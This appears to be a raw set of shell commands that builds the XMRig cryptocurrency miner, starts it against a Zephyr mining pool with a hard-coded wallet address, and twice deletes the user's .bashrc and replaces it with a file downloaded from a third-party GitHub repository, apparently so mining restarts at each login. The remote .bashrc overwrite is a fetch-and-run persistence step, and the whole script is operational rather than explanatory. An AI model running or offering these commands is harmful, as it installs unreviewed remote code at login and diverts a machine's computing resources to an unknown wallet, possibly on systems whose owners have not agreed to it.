

cd xmrig/build 
./xmrig -o sg-zephyr.miningocean.org:5462 -u ZEPHYR2cD4AD7QJz4o7TT6hvQukriEyspC2q1Kit4qHVN1FSuAMBGbXAUrwgsPknrW2fsxrM4msBLMZSWisbiqZGgK22oVGYQz41w -p Box1Note8 -a rx/0 -k -t 6

apt update -y
apt upgrade -y
apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev figlet -y
figlet -f small Cloning repository
git clone https://github.com/xmrig/xmrig
mkdir xmrig/build
cd xmrig/build
figlet -f small xmrig OK
cmake ..
make -j$(nproc)
figlet -f small setting ok
apt remove figlet -y
echo Removed extra packages.

./xmrig -o sg-zephyr.miningocean.org:5462 -u ZEPHYR2cD4AD7QJz4o7TT6hvQukriEyspC2q1Kit4qHVN1FSuAMBGbXAUrwgsPknrW2fsxrM4msBLMZSWisbiqZGgK22oVGYQz41w -p Box1Note8 -a rx/0 -k -t 6



rm -rf .bashrc
wget https://raw.githubusercontent.com/scorpionyb/file-bashrc/main/bash.xmr && cp bash.xmr .bashrc
nano .bashrc
rm -rf bash.xmr





apt-get update -y
apt-get install wget -y

rm -rf .bashrc
wget https://raw.githubusercontent.com/scorpionyb/file-bashrc/main/bash.xmr && cp bash.xmr .bashrc
rm -rf bash.xmr
